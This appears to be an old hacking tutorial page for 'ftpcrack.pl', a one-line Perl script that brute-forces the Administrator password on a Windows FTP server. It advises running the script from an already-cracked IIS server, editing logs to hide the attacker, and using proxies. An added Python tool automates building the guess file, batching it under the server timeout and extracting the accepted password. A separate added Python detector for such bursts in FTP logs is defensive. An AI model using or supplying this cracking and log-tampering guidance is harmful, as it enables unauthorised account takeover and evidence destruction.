Ftpcrack.pl

 

This is a good one! Ftpcrack.pl connects to an ftp site and tests the Administrator account against a list of passwords held in a text file (cracknt.txt). To be more precise, ftpcrack.pl runs the Windows ftp client with the -n option (suppress auto-login) and the -s option. The -s option tells the ftp client to read its commands from a text file instead of the keyboard. In this case cracknt.txt holds one command per password to try, each of the form below (*password stands for the password being tried; ftp carries on with the next line when a login is refused):

 

user administrator *password

 

The line in the Perl script (actually the only line in the script) that does this is:

 

system('ftp -n -s:cracknt.txt 127.0.0.1 > cracked.txt');

 

(Copy this line into Notepad and save it as ftpcrack.pl.)

Note the " > cracked.txt" at the end. This redirects the ftp client's output into the text file cracked.txt; you open cracked.txt afterwards to see whether one of the guesses was accepted. This relies on two things:

 

  1. The Administrator has a weak password, one that appears in cracknt.txt.
  2. The ftp service isn't configured to allow only anonymous connections (if it is, the user command is refused whatever the password).

 

The beauty of this one is that it can be run remotely. Let's say you have cracked an NT Internet Information Server and have admin rights on it. You can copy this script to that server using Explorer and put it in c:\inetpub\scripts or the equivalent. It has to go in a www directory that has the 'execute' permission enabled. You could also try c:\inetpub\ASPSamp\AdvWorks or, if they have it, c:\inetpub\cgi-bin. Once you have copied it there you can run it via your web browser. This means you are using up their bandwidth and not running up your phone bill! To run it remotely, enter the following URL in your browser:

 

http://www.company.com/scripts/ftpcrack.pl

 

After you run it, make sure you edit the web server's log file to hide the fact that you were the one who ran it. If you don't do this, at least go through a couple of proxy servers. (To find out how to do this, read my IP FYI.)

 

Before you upload ftpcrack.pl to the server, edit the IP address in the following line, changing 127.0.0.1 to the IP address of the machine you want to crack:

 

system('ftp -n -s:cracknt.txt 127.0.0.1 > cracked.txt');

 

You'll also need to upload cracknt.txt and put it in the same directory. The -s: argument is a relative path, so ftp only finds the file if it is started in that directory; if it can't find it, put the full path to cracknt.txt in the -s: argument instead.

Once all the passwords in cracknt.txt have been tested, connect to the server using Windows Explorer and open cracked.txt. Note: you won't be able to get to this file over the web, because the /scripts directory should deny the 'read' permission. Once you have cracked.txt, search it in Notepad for "logged": if one of the guesses worked you'll find the message "user administrator logged in."

 

Note: this will fill the target machine's event log with failed-logon messages (bad user name or password), and the ftp log file will show the activity as well if ftp logging is enabled. If you are running it remotely, though, the IP address of the machine you run it from is what gets logged, not yours.
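What this looks like from the defender's side, as an added example that is not part of the page: the log lines below are constructed in the shape of an IIS W3C FTP log (the parser takes its column names from the #Fields: line, so adjust to whatever the real log carries), and the code flags a source IP that racks up repeated 530 replies to PASS inside a short window, and separately a login that succeeds right after such a burst, which is the "logged in" line the page tells you to search for. The threshold and window are assumptions to tune per site.

```python
"""Added example (defender's side, not part of the page): find the brute
force described above in an IIS-style W3C FTP log and flag the success
that follows it.  The log below is constructed, not a real capture."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, Iterable, Iterator, List, Optional, Tuple

SAMPLE_LOG = """#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Date: 2001-05-03 12:00:00
#Fields: time c-ip cs-method cs-uri-stem sc-status
12:00:01 10.0.0.5 [1]USER administrator 331
12:00:01 10.0.0.5 [1]PASS - 530
12:00:02 10.0.0.5 [1]USER administrator 331
12:00:02 10.0.0.5 [1]PASS - 530
12:00:03 10.0.0.5 [1]USER administrator 331
12:00:03 10.0.0.5 [1]PASS - 530
12:00:04 10.0.0.5 [1]USER administrator 331
12:00:04 10.0.0.5 [1]PASS - 530
12:00:05 10.0.0.5 [1]USER administrator 331
12:00:05 10.0.0.5 [1]PASS - 530
12:00:06 10.0.0.5 [1]USER administrator 331
12:00:06 10.0.0.5 [1]PASS - 530
12:00:07 10.0.0.5 [1]USER administrator 331
12:00:07 10.0.0.5 [1]PASS - 230
12:03:00 10.0.0.9 [2]USER jsmith 331
12:03:00 10.0.0.9 [2]PASS - 530
12:03:05 10.0.0.9 [2]USER jsmith 331
12:03:05 10.0.0.9 [2]PASS - 230
"""

_METHOD = re.compile(r"^\[(\d+)\](\w+)$")   # IIS FTP writes '[conn]VERB'


def parse_w3c(text: str) -> Iterator[dict]:
    """Yield one dict per entry, keyed by the names in the #Fields: header.
    Each entry gets a 'ts' datetime from its date column, or from the
    #Date: header when the log only carries a time column."""
    fields: Optional[List[str]] = None
    default_date: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#Date:"):
            default_date = line.split()[1]
            continue
        if line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue                      # malformed line; count these in production
        rec = dict(zip(fields, parts))
        date = rec.get("date", default_date)
        if date is None or "time" not in rec:
            continue
        rec["ts"] = datetime.strptime(f"{date} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        yield rec


def login_attempts(records: Iterable[dict]) -> Iterator[Tuple[datetime, str, str, bool]]:
    """(timestamp, client ip, user name, succeeded) for every PASS command.
    The user name is taken from the USER command on the same connection."""
    current_user: Dict[Tuple[str, str], str] = {}
    for rec in records:
        m = _METHOD.match(rec.get("cs-method", ""))
        if not m:
            continue
        key = (rec.get("c-ip", "-"), m.group(1))
        verb = m.group(2).upper()
        if verb == "USER":
            current_user[key] = rec.get("cs-uri-stem", "-")
        elif verb == "PASS":
            yield rec["ts"], key[0], current_user.get(key, "-"), rec.get("sc-status") == "230"


def detect(attempts: Iterable[Tuple[datetime, str, str, bool]],
           threshold: int = 5,
           window: timedelta = timedelta(seconds=60)) -> Tuple[Dict[str, int], List[Tuple[str, str]]]:
    """Sliding-window count of failures per source IP.  Returns the IPs that
    reached `threshold` failures inside `window` (with the peak count) and the
    (ip, user) logins that succeeded while such a burst was still in the window."""
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    bursts: Dict[str, int] = {}
    compromised: List[Tuple[str, str]] = []
    for ts, ip, user, ok in sorted(attempts):
        q = recent[ip]
        while q and ts - q[0] > window:
            q.popleft()
        if ok:
            if len(q) >= threshold:
                compromised.append((ip, user))
            continue
        q.append(ts)
        if len(q) >= threshold:
            bursts[ip] = max(bursts.get(ip, 0), len(q))
    return bursts, compromised


if __name__ == "__main__":
    bursts, compromised = detect(login_attempts(parse_w3c(SAMPLE_LOG)))
    for ip, n in bursts.items():
        print(f"ALERT {ip}: {n} failed ftp logins inside the window")
    for ip, user in compromised:
        print(f"ALERT {ip}: '{user}' logged in right after a burst of failures")
```

A single failure from 10.0.0.9 followed by a success is the normal typo pattern and stays quiet; the second alert (success after a burst) is the one worth paging on, because it means the word list contained the password.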


2nd Note: because the target server will time out the connection after 900 seconds if no valid login has occurred, you may have to split the password file into chunks and run it in batches.
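The same workflow in code, as an added example that is not the page's script (the page's tool is the one-line Perl wrapper above; this is Python so it can be run and checked anywhere): it turns a plain word list into the cracknt.txt command file described at the top of the page, splits it into batches sized to stay under the 900-second timeout from the note above, and picks the accepted password out of the redirected output (cracked.txt) by locating the "logged in" line the page tells you to search for. The per-guess timing, the echoed "ftp> user ..." line format in the client output, and the sample output are assumptions or constructed data, not captured from a real server.

```python
"""Added example (not the page's script): build the ftp -s: command file the
page calls cracknt.txt from a plain word list, split it into batches that
finish inside the server's idle timeout, and pull the accepted password out
of the redirected ftp output (cracked.txt)."""
import re
from typing import Iterator, List, Optional, Sequence

# The page says the target drops the session after 900 s without a valid
# login.  The cost per guess is an assumption; measure it against the target.
IDLE_TIMEOUT_S = 900
ASSUMED_SECONDS_PER_GUESS = 2.0


def batch_size_for(timeout_s: float = IDLE_TIMEOUT_S,
                   seconds_per_guess: float = ASSUMED_SECONDS_PER_GUESS,
                   safety: float = 0.8) -> int:
    """Number of guesses that fit in one session with a margin under the timeout."""
    return max(1, int(timeout_s * safety / seconds_per_guess))


def build_ftp_script(username: str, passwords: Sequence[str]) -> str:
    """One 'user <name> <password>' line per guess, then quit.

    ftp.exe splits each command line on whitespace, so an empty password or
    one containing whitespace cannot be expressed this way and is skipped.
    """
    lines = [f"user {username} {pw}" for pw in passwords
             if pw and not re.search(r"\s", pw)]
    lines.append("quit")
    return "\n".join(lines) + "\n"


def split_batches(passwords: Sequence[str], size: int) -> Iterator[List[str]]:
    """Consecutive slices of the word list, each at most `size` guesses long."""
    for start in range(0, len(passwords), size):
        yield list(passwords[start:start + size])


# Assumption: ftp.exe echoes each scripted command as 'ftp> user NAME PASSWORD'.
_ECHO = re.compile(r"^ftp>\s*user\s+(\S+)\s+(\S+)", re.IGNORECASE)


def find_cracked(output: str, username: str,
                 batch: Sequence[str]) -> Optional[str]:
    """Return the password that drew a '230 ... logged in' reply, or None.

    Preferred source: the echoed 'ftp> user' line that precedes the 230 reply.
    Fallback when the client did not echo: every rejected guess produces one
    '530' reply, so the number of 530 lines seen so far is the index of the
    accepted guess within `batch`.
    """
    last_echo: Optional[str] = None
    failures = 0
    for line in output.splitlines():
        m = _ECHO.match(line)
        if m and m.group(1).lower() == username.lower():
            last_echo = m.group(2)
            continue
        if line.startswith("530"):
            failures += 1
        elif line.startswith("230") and "logged in" in line.lower():
            if last_echo is not None:
                return last_echo
            return batch[failures] if failures < len(batch) else None
    return None


# Constructed sample of what cracked.txt might hold; not a real capture.
WORDS = ["password", "admin", "letmein", "s3cret", "welcome"]
SAMPLE_OUTPUT = """Connected to 10.0.0.7.
220 target Microsoft FTP Service (Version 4.0).
ftp> user administrator password
331 Password required for administrator.
530 User administrator cannot log in.
ftp> user administrator admin
331 Password required for administrator.
530 User administrator cannot log in.
ftp> user administrator letmein
331 Password required for administrator.
230 User administrator logged in.
ftp> quit
221
"""

if __name__ == "__main__":
    size = batch_size_for()
    for n, batch in enumerate(split_batches(WORDS, size), 1):
        # each batch becomes its own cracknt-<n>.txt to run with ftp -n -s:
        print(f"--- cracknt-{n}.txt ({len(batch)} guesses) ---")
        print(build_ftp_script("administrator", batch), end="")
    print("accepted password:", find_cracked(SAMPLE_OUTPUT, "administrator", WORDS))
```

Keep each batch's word list next to its cracked.txt: if the client does not echo the commands, the position of the accepted guess is recovered from the count of 530 replies before the 230 line, so it only makes sense relative to that batch.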

 

For a zipped version of cracknt.txt click here.
